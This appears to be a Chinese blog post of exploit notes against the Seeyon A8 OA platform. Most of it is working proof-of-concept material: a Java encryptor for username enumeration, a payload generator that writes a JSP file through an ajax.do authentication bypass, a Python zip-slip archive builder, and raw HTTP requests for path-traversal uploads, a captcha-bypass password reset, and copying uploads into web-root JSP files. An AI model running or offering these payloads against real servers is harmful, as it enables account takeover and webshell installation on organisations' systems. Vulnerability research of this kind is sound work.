用户名遍历
/seeyon/rest/password/retrieve/send/username
通过绑定来遍历用户是否存在
高版本中设置加密传输,修改请求为post+json
/seeyon/rest/password/retrieve/send
{"loginName":"gJ90ikKmIGY="}加密算法:
import java.util.Base64;
import javax.crypto.spec.DESedeKeySpec;
import javax.crypto.*;
import javax.crypto.spec.DESedeKeySpec;
import javax.crypto.spec.IvParameterSpec;
import java.security.Key;
public class Main {
public static void main(String[] args) {
String pass="sysadmin";
try {
DESedeKeySpec spec = new DESedeKeySpec("[email protected]$#M1#$".getBytes());
SecretKeyFactory keyFactory = SecretKeyFactory.getInstance("desede");
Key deskey = keyFactory.generateSecret(spec);
Key secretKey = keyFactory.generateSecret(spec);
Cipher cipher = Cipher.getInstance("desede/CBC/PKCS5Padding");
IvParameterSpec ips = new IvParameterSpec("01234567".getBytes());
cipher.init(1, deskey, ips);
byte[] secData=cipher.doFinal(pass.getBytes());
String enData=Base64.getEncoder().encodeToString(secData);
System.out.println(enData);
}catch(Exception e){
}
}
}
ajax.do权限绕过
分析文章:某OA ajax.do处漏洞分析
低版本常见漏洞,通过解析差异来绕过路由限制,文中给出autoinstall.do路由来绕过
poc:
生成gzip数据
import com.seeyon.ctp.common.excel.DataRecord;
import com.seeyon.ctp.common.log.CtpLogFactory;
import com.seeyon.ctp.util.ZipUtil;
import com.seeyon.ctp.util.json.JSONUtil;
import org.apache.commons.logging.Log;
import java.net.URLEncoder;
import java.util.ArrayList;
public class fileToExcelManagerPayload {
private static final Log LOGGER = CtpLogFactory.getLog(fileToExcelManagerPayload.class);
public static void main(String[] args) {
DataRecord d = new DataRecord();
String[] c = {"\"\r\n"+"<% out.println(\"ttttttttt\"); %>"+"\"\r\n"};
d.setColumnName(c);
String dd = JSONUtil.toJSONString(d);
final ArrayList<Object> list = new ArrayList<>();
list.add("../webapps/ROOT/x.jsp");
list.add("\"\"");
list.add(d);
final String list1 = JSONUtil.toJSONString(list);
String strArgs = ZipUtil.compressResponse(list1, "gzip", "UTF-8", LOGGER);
System.out.println(URLEncoder.encode(strArgs));
System.out.println("end");
}
}数据包:
POST /seeyon/autoinstall.do/../ajax.do?method=ajaxAction&managerName=fileToExcelManager HTTP/1.1
Host: xxx
Accept: */*
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 6357
managerMethod=saveExcelInBase&managerName=fileToExcelManager&method=ajaxAction&requestCompress=gzip&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00%5D%C2%8D%C3%81%0A%C3%820%10D%7F%C2%A5%2C%14%14B%C3%A2%C2%B9%C2%8A%C3%A7%1E%C3%84%C2%82%14%3C4%3D%C2%A46%C3%98H%C2%9A%C2%84dC%05%C3%B1%C3%9FM%09zp%C3%B64%C2%8F%C3%A5M%07%C2%94%C2%B2E%0E%C3%82%C2%B9%C3%80.M%C3%93%C2%B2%27%7D%04%07%04x%3A+%2F%C2%B8Y%1Dgs%16%C2%B3%C2%84%C2%AA%5B%C2%A9%C3%A7%C3%A6P%166%22u%5E%19%C3%94f%C3%83%01%C2%BF%C3%A1%C2%B0%C3%9D%17%C3%A51%C2%BFAO%60%14%28j%29%C3%86%C2%93%0A%C2%98%04%C2%89d%C3%A1U%C3%A1%04%C2%95%C2%89Z%13%08%C2%93%C2%94%C2%98%172%40%C2%85%C3%BAWB%1C%C3%9A%C2%BF%5EKu%C2%9F%C2%92nG%C3%80%C3%9Be%C3%95%C2%BE%C3%BB%0F%C3%8BJZ%C2%B7%C3%8A%00%00%00后台文件解压
原理都是低权限用户上传zip时,解压时目录穿越上传jsp
跟ofd不同在于一次性完成,且调用接口不同
上传数据包构造:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<h1>uploadFile</h1>
<form action="http://192.168.203.25/seeyon/workflow/cie.do?method=impo
rtProcess" method="post" enctype="multipart/form-data">
<p><input type="file" name="file"></p>
<p><input type="submit" value="submit"></p>
</form>
</body>
</html>
压缩包生成:
import zipfile
if __name__ == "__main__":
file = "h1.jsp"
try:
with open(file, "r") as f:
binary = f.read()
zipFile = zipfile.ZipFile("t2.zip", "a", zipfile.ZIP_DEFLATED)
info = zipfile.ZipInfo("test.zip")
zipFile.writestr("..\\..\\webapps\\ROOT\\bak1.jsp", binary)
zipFile.close()
except IOError as e:
raise e低版本接口:cie.do
poc:
POST /seeyon/workflow/cie.do?method=importProcess HTTP/1.1
Host: 192.168.203.25
Content-Length: 353
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG4m3BNZiXbTVIltz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=D61255AD8F0ACA34024A3CFE7C89340D
Connection: close
------WebKitFormBoundaryG4m3BNZiXbTVIltz
Content-Disposition: form-data; name="file"; filename="test.zip"
Content-Type: application/zip
zip数据
------WebKitFormBoundaryG4m3BNZiXbTVIltz--高版本接口:designer.do
poc:
POST /seeyon/workflow/designer.do?method=importProcess HTTP/1.1
Host: 192.168.203.25
Content-Length: 353
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryG4m3BNZiXbTVIltz
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=D61255AD8F0ACA34024A3CFE7C89340D
Connection: close
------WebKitFormBoundaryG4m3BNZiXbTVIltz
Content-Disposition: form-data; name="file"; filename="test.zip"
Content-Type: application/zip
zip数据
------WebKitFormBoundaryG4m3BNZiXbTVIltz--用户密码重置
老洞,验证码绕过重置密码
poc:
POST /seeyon/rest/phoneLogin/phoneCode/resetPassword HTTP/1.1
Host: 192.168.136.55
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Content-Length: 45
Content-Type: application/json
Accept-Encoding: gzip
{"loginName": "test","password":"1qaz@WSX"}后台文件上传点
都会过滤jsp,要配合加密使用
调用save时会保存id,可以跟ofd配合,部分则只是上传
save上传,位置在base/upload/2024/01/01/id
POST /seeyon/fileUpload.do?method=processUpload HTTP/1.1
Host:192.168.10.2
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.25.1
Cookie: JSESSIONID=3495C4DEF87200EA323B1CA31E3B7DF5
Content-Length: 841
Content-Type: multipart/form-data; boundary=59229605f98b8cf290a7b8908b34616b
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="firstSave"
true
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="callMethod"
resizeLayout
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="isEncrypt"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="takeOver"
false
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="type"
0
--59229605f98b8cf290a7b8908b34616b
Content-Disposition: form-data; name="file1"; filename="11.zip"
Content-Type: text/plain
111
--59229605f98b8cf290a7b8908b34616b--普通上传,位置在base/upload/2024/01/01/id
POST /seeyon/fileUpload.do?method=processUpload&type=1&applicationCategory=1&extensions=jpg,gif,jpeg,png&maxSize=5242880&callback=imgUploadCallBack&closeWindow=false&serverTime=true HTTP/1.1
Host: 192.168.144.1
Content-Length: 199
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryDmqbiz5fkZYKfWPI
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C40461224
Connection: close
------WebKitFormBoundaryDmqbiz5fkZYKfWPI
Content-Disposition: form-data; name="upload"; filename="image.gif"
Content-Type: image/gif
gif89a
achaeaf
------WebKitFormBoundaryDmqbiz5fkZYKfWPI--
save上传,位置在base/resources/portal/css/id
POST /seeyon/ajax.do?method=ajaxAction&managerName=portalCssManager&rnd=57507 HTTP/1.1
Accept: */*
Host: 192.168.1.11
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C4046122
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
arguments=%5B%22aaaaa%22%5D&managerMethod=generateCssFileByCssStrofd解压漏洞
需要普通用户权限,本质是zip解压目录穿越,v8以上的版本基本修复
上传还是老接口
上传后获取id,搜索fileurls=fileurls,后面就是id了
解压接口
POST /seeyon/ajax.do;Jsessionid=a?method=ajaxAction&managerName=govdocGBManager&rnd=29981 HTTP/1.1
Accept: */*
CSRFTOKEN:
Host: 192.168.246.4
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=1; avatarImageUrl=3003611276195810894; login_locale=zh_CN
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 63
arguments=["-7373142480696292225"]&managerMethod=getOfdMetadata还可以试试这个接口,区别不大
GET /seeyon/content/content.do?method=invokingForm&extensions=zip&isNew=1&ofdFileId=-3217079395985044654&subApp=2 HTTP/1.1
Accept: */*
Host: 192.168.246.4
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=1; avatarImageUrl=3003611276195810894; login_locale=zh_CN
Accept-Encoding: gzip, deflatecopy文件
copy文件到新位置,可以目录穿越和改后缀
POST /seeyon/ajax.do?method=ajaxAction&managerName=cipSynSchemeManager&rnd=29981 HTTP/1.1
Accept: */*
Host: 192.168.1.11
Connection: close
User-Agent: Apache-HttpClient/4.5.13 (Java/1.8.0_321)
Cookie: JSESSIONID=70F47A9A7198F0FCC47E5B3C40461224;
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 134
arguments=["../../../../upload/2024/01/08/-3156853247588808973","../../ApacheJetspeed/webapps/ROOT/1234.jsp"]&managerMethod=copyFileA8安装
先启动s1 agent,然后通过web页面启动a8服务
开启远程调试在ApacheJetspeed\bin\startup.bat里增加一行SET CATALINA_OPTS=-server -Xdebug -Xnoagent -Djava.compiler=NONE -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000,重启a8服务
Comments | NOTHING